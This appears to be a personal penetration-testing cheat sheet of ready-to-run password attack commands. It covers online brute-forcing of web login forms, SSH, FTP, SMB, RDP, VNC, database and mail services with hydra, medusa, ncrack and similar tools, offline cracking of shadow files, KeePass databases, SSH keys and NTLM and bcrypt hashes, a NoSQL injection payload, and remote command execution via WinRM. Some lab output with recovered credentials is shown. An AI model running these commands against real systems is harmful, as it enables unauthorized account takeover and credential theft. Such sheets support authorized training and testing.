Bruteforce

hydra -L user.txt -P pass.txt -s 80 -f $IP -V http-get / 

medusa -h $IP -n 80 -U user.txt -P pass.txt -M  http -m DIR:/ -T 10

hydra $IP http-post-form "/login.php:username=^USER^&password=^PASS^:invalid" -l <USER> -P <PASS_FILE> -vV -f

ffuf -w <PASS_FILE> -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -x http://127.0.0.1:8080 -fs 206

wfuzz -c -z file,<USER_NAMES_FILE> --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://$URL

proxychains -q hydra $IPP_INTRANET http-post-form "/wordpress/login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fintranet.relia.com%2Fwordpress%2Fwp-admin%2F&testcookie=1:incorrect" -L user.txt -P pass.txt -vV -f

hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $IP ftp

hydra -L user.txt -P pass.txt ftp://$IP -I

hydra -l admin -P pass.txt ftp://$IP -I

hydra -L user.txt -P pass.txt ssh://$IP -I
#hydra -l root -P pass.txt ssh://$IP -I

sudo nmap -p 22 --script ssh-brute --script-args userdb=user.txt,passdb=pass.txt $IP

medusa -U user.txt -P pass.txt -h $IP -M ssh -n 22

ncrack -p ssh -U user.txt -P pass.txt ssh://$IP:22
#ncrack -p ssh --user msfadmin -P pass.txt $IP

crackmapexec smb $IP -u user.txt -p pass.txt

hydra -L user.txt -P pass.txt $IP smb

hydra -s 5900 -P pass.txt -t 4 -V -f vnc://$IP

ncrack -P $PASS $IP:5900

medusa -h $IP -u gamma -P pass.txt -M vnc

crowbar -vv -b rdp -U user.txt -C pass.txt -s $IP/32
crowbar -vv -b rdp -U user.txt -C pass.txt -n 1 -s $IP/32
|->
2023-05-23 14:24:29 RDP-SUCCESS : 192.168.226.250:3389 - offsec:lab

hydra -V -f -L user.txt -P pass.txt rdp://$IP
|->
[3389][rdp] host: 192.168.226.250   login: offsec   password: lab 

ncrack -vv -U user.txt -P pass.txt rdp://$IP
|->
FAIL, don't know why doesn't works

crackmapexec rdp $IP_OFFSEC -u user.txt -p pass.txt
|->
FAIL, don't know why doesn't works

medusa -h $IP -M mysql -U user.txt -P pass.txt -t 20 -f

hydra -L user.txt -P pass.txt $IP mysql -t 20 -f -I

hydra -L user.txt -P pass.txt -f $IP -s 110 pop3 -V

hydra -L user.txt -P pass.txt -f $IP -s 143 imap -V

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=users.txt,passdb=pass.txt  -p 6697 $IP

hydra -l postgres -P pass.txt $IP postgres

hydra -L user.txt -P pass.txt $IP postgres

medusa -h $IP -u postgres -P pass.txt -M postgres

medusa -h $IP -U user.txt -P pass.txt -M postgres

ncrack -v -U user.txt -P pass.txt $IP:5432

patator pgsql_login host=$IP user=FILE0 0=user.txt password=FILE1 1=pass.txt

nmap -sV --script pgsql-brute --script-args userdb=user.txt,passdb=pass.txt -p 5432 $IP

use auxiliary/scanner/postgres/postgres_login

crackmapexec winrm $IP -d $domainName -u user.txt -p pass.txt

crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"

crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'

export HYDRA_PROXY_HTTP=http://127.0.0.1:8080  

hydra -F -vV -l root -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1&token=a6afebdd3311fac747d68adb1a8bd7ca:denied"

medusa \
  -h $IP \
  -u root \
  -P /usr/share/wordlists/rockyou.txt \
  -M web-form \
  -m FORM:"phpmyadmin/index.php" \
  -m DENY-SIGNAL:"denied" \
  -m FORM-DATA:"post?pma_username=&pma_password=&server=1&&token=i=TQRF[zI*sEkNu@"

hydra -l <USER> -P <PASS_FILE> $IP http-post-form "/webmail/src/redirect.php:username=^USER^&password=^PASS^:F=incorrect" -V -F -u

USER_FILE=/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
FAILED_MSG="Login failed. Please try again."
COOKIES="testing=1"

hydra $IP -s 10000 -t 4 http-form-post "/session_login.cgi:page=%2F&user=USER&pass=^PASS^&submit=Login:${FAILED_MSG}:H=Cookie: ${COOKIES}" -L $USER_FILE -p ".2uqPEfj3D<P'a-3" -vV -f

hydra -l zelda -P pass.txt -f $IP pop3 -V
hydra -S -v -l zelda -P pass.txt -s 995 -f $IP pop3 -V

keepass2john Database.kdbx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
kpcli --kdb Database.kdbx

unshadow passwd shadow > passwd_shadow.txt
john passwd_shadow.txt --wordlist=/usr/share/wordlists/rockyou.txt

john --format=crypt passwd_shadow.txt  --wordlist=/usr/share/wordlists/rockyou.txt

hashcat -m 1800 passwd_shadow.txt /usr/share/wordlists/rockyou.txt -O

ssh2john id_rsa > id_rsa-hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa-hash

# hashcat --help | grep NTLM
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

# hashcat --help | grep NTLM
hashcat -m 1000 --force 26112010952d963c8dc4217daec986d9 /usr/share/wordlists/rockyou.txt

cewl -w pass.lst http://wordpress.hack -d 1

cat pass.lst | uniq | sort | tr '[:upper:]' '[:lower:]' > pass2.lst

curl http://$URL | grep -oE '\w+' | sort -u -f > wordlist.lst
awk 'length($0) > 3 ' wordlist.lst > wordlist_gt3.lst

hashcat -a 0 -m 0 hash.txt /usr/share/wordlists/rockyou.txt

hashcat -a 0 -m 100 hash.txt /usr/share/wordlists/rockyou.txt

echo '$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS' > hash.txt
hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
|->
$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS:doraemon